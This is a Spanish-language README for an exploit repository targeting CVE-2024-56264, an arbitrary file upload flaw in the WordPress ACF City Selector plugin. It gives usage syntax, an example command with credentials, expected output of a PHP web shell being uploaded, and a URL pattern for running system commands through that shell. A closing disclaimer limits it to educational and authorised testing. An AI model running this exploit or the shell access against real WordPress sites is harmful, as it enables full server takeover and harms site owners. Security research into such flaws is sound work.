
WordPress ACF City Selector plugin <= 1.14.0 - Vulnerabilidad de subida arbitraria de archivos
Este repositorio contiene un exploit para CVE-2024-56264, que es una vulnerabilidad de Subida Arbitraria de Archivos encontrada en el plugin ACF City Selector de WordPress (versiones <= 1.14.0). Esta vulnerabilidad permite a un atacante subir un archivo PHP malicioso (web shell) a una instancia vulnerable de WordPress y ejecutar comandos arbitrarios en el servidor.
<= 1.14.0El plugin ACF City Selector no valida correctamente los archivos subidos, lo que permite a los atacantes omitir restricciones y subir archivos PHP arbitrarios. Una vez que se sube un archivo PHP malicioso, un atacante puede ejecutar comandos del sistema de forma remota, lo que conduce al compromiso total del servidor.
Asegúrate de tener instalado lo siguiente antes de ejecutar el script:
requests (Instálalo usando: pip install requests)Puedes instalar todas las dependencias necesarias usando:
pip install -r requirements.txt
Ejecutando el exploit:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help show this help message and exit
--url URL Website base URL (e.g., http://192.168.100.74/wordpress)
--username USERNAME WordPress username
--password PASSWORD WordPress password
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
Tras una explotación exitosa, deberías ver:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
Si tiene éxito, accede al shell subido mediante:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
Esto permite la ejecución remota de comandos en el servidor.
Este script está destinado solo para fines educativos y de pruebas de seguridad autorizadas. El uso no autorizado es ilegal y puede acarrear graves consecuencias. El autor no es responsable del mal uso de este exploit.